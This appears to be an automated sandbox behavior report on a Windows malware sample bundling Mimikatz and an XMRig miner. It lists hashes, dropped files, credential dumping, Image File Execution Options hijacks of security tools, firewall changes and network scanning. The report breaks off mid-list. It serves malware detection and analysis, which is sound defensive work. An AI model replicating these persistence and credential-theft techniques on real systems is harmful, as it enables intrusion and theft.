Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-01-2025 19:28
Behavioral task
behavioral1
Sample
2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe
-
Size
9.6MB
-
MD5
fa07a8a8dd1db8255de1cc41662fa2c5
-
SHA1
1eef2a92f550095e3e3d7dd1d3214720dd64c8d7
-
SHA256
1e879c00229ad58f02d0ad0879cf665dee3ce180a638f9e04f5e56b6830b1c8a
-
SHA512
f445c0eff37b09d47cb04824e38fe0515c31a9a2c94261d326e874c806bd345cdbed6725a860096e9faafeb7ac67a7b9bdac7653295e06944ce3e00410c6bffa
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1144 created 2040 1144 qugzbwz.exe 37 -
Xmrig family
-
Contacts a large (31102) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4464-178-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-183-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-203-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-216-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-225-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-236-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-249-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-290-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-291-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-355-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-356-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig behavioral2/memory/4464-362-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4496-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4496-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023c73-5.dat mimikatz behavioral2/memory/2820-136-0x00007FF6B77A0000-0x00007FF6B788E000-memory.dmp mimikatz behavioral2/memory/2820-138-0x00007FF6B77A0000-0x00007FF6B788E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts qugzbwz.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts qugzbwz.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" qugzbwz.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2712 netsh.exe 1792 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 3356 qugzbwz.exe 1144 qugzbwz.exe 4212 wpcap.exe 4904 ttpfdpuzu.exe 2820 vfshost.exe 4008 xohudmc.exe 3788 qicmew.exe 4992 uyllzzcqz.exe 4464 gtnnts.exe 1780 uyllzzcqz.exe 3920 uyllzzcqz.exe 956 uyllzzcqz.exe 3916 uyllzzcqz.exe 3012 uyllzzcqz.exe 5112 uyllzzcqz.exe 3128 uyllzzcqz.exe 3416 uyllzzcqz.exe 3288 uyllzzcqz.exe 1576 qugzbwz.exe 5108 uyllzzcqz.exe 4608 uyllzzcqz.exe 1428 uyllzzcqz.exe 3592 uyllzzcqz.exe 2868 uyllzzcqz.exe 2736 uyllzzcqz.exe 2704 uyllzzcqz.exe 4080 uyllzzcqz.exe 1528 gfspysiek.exe 6016 qugzbwz.exe -
Loads dropped DLL 12 IoCs
pid Process 4212 wpcap.exe 4212 wpcap.exe 4212 wpcap.exe 4212 wpcap.exe 4212 wpcap.exe 4212 wpcap.exe 4212 wpcap.exe 4212 wpcap.exe 4212 wpcap.exe 4904 ttpfdpuzu.exe 4904 ttpfdpuzu.exe 4904 ttpfdpuzu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 63 ifconfig.me 64 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F qugzbwz.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\qicmew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F qugzbwz.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData qugzbwz.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content qugzbwz.exe File created C:\Windows\SysWOW64\qicmew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 qugzbwz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 qugzbwz.exe -
resource yara_rule behavioral2/files/0x0007000000023ccb-134.dat upx behavioral2/memory/2820-136-0x00007FF6B77A0000-0x00007FF6B788E000-memory.dmp upx behavioral2/memory/2820-138-0x00007FF6B77A0000-0x00007FF6B788E000-memory.dmp upx behavioral2/memory/4992-156-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/files/0x0007000000023cd6-155.dat upx behavioral2/memory/4992-161-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/files/0x0007000000023cd4-164.dat upx behavioral2/memory/4464-165-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/1780-171-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/3920-175-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/4464-178-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/956-180-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/4464-183-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/3916-185-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/3012-189-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/5112-193-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/3128-197-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/3416-201-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/4464-203-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/3288-206-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/5108-214-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/4464-216-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/4608-219-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/1428-223-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/4464-225-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/3592-228-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/2868-231-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/2736-233-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/2704-235-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/4464-236-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/4080-238-0x00007FF646940000-0x00007FF64699B000-memory.dmp upx behavioral2/memory/4464-249-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/4464-290-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/4464-291-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/4464-355-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/4464-356-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx behavioral2/memory/4464-362-0x00007FF7156C0000-0x00007FF7157E0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\epkuieeth\UnattendGC\specials\docmicfg.xml qugzbwz.exe File created C:\Windows\etekeszy\schoedcl.xml qugzbwz.exe File created C:\Windows\epkuieeth\Corporate\vfshost.exe qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\wpcap.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\ucl.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\vimpcsvc.exe qugzbwz.exe File created C:\Windows\epkuieeth\Corporate\mimilib.dll qugzbwz.exe File opened for modification C:\Windows\etekeszy\svschost.xml qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\wpcap.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\ssleay32.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\schoedcl.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\crli-0.dll qugzbwz.exe File opened for modification C:\Windows\etekeszy\spoolsrv.xml qugzbwz.exe File created C:\Windows\ime\qugzbwz.exe qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\gfspysiek.exe qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\ip.txt qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\tucl-1.dll qugzbwz.exe File created C:\Windows\epkuieeth\Corporate\mimidrv.sys qugzbwz.exe File created C:\Windows\epkuieeth\upbdrjv\swrpwe.exe qugzbwz.exe File created C:\Windows\etekeszy\vimpcsvc.xml qugzbwz.exe File opened for modification C:\Windows\etekeszy\vimpcsvc.xml qugzbwz.exe File opened for modification C:\Windows\etekeszy\schoedcl.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\AppCapture64.dll qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\Packet.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\docmicfg.xml qugzbwz.exe File created C:\Windows\etekeszy\svschost.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\Shellcode.ini qugzbwz.exe File opened for modification C:\Windows\epkuieeth\Corporate\log.txt cmd.exe File opened for modification C:\Windows\epkuieeth\uybmnnqef\Result.txt gfspysiek.exe File created C:\Windows\epkuieeth\UnattendGC\specials\cnli-1.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\tibe-2.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\vimpcsvc.xml qugzbwz.exe File opened for modification C:\Windows\epkuieeth\uybmnnqef\Packet.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\schoedcl.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\spoolsrv.xml qugzbwz.exe File opened for modification C:\Windows\etekeszy\docmicfg.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\svschost.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\spoolsrv.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\schoedcl.exe qugzbwz.exe File created C:\Windows\etekeszy\qugzbwz.exe 2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\docmicfg.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\spoolsrv.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\coli-0.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\libeay32.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\vimpcsvc.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\xdvl-0.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\svschost.xml qugzbwz.exe File opened for modification C:\Windows\etekeszy\qugzbwz.exe 2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\libxml2.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\trch-1.dll qugzbwz.exe File created C:\Windows\etekeszy\docmicfg.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\exma-1.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\posh-0.dll qugzbwz.exe File created C:\Windows\etekeszy\spoolsrv.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\svschost.xml qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\AppCapture32.dll qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\scan.bat qugzbwz.exe File created C:\Windows\epkuieeth\uybmnnqef\ttpfdpuzu.exe qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\trfo-2.dll qugzbwz.exe File created C:\Windows\epkuieeth\UnattendGC\specials\zlib1.dll qugzbwz.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 428 sc.exe 4036 sc.exe 1344 sc.exe 1328 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ttpfdpuzu.exe Key opened 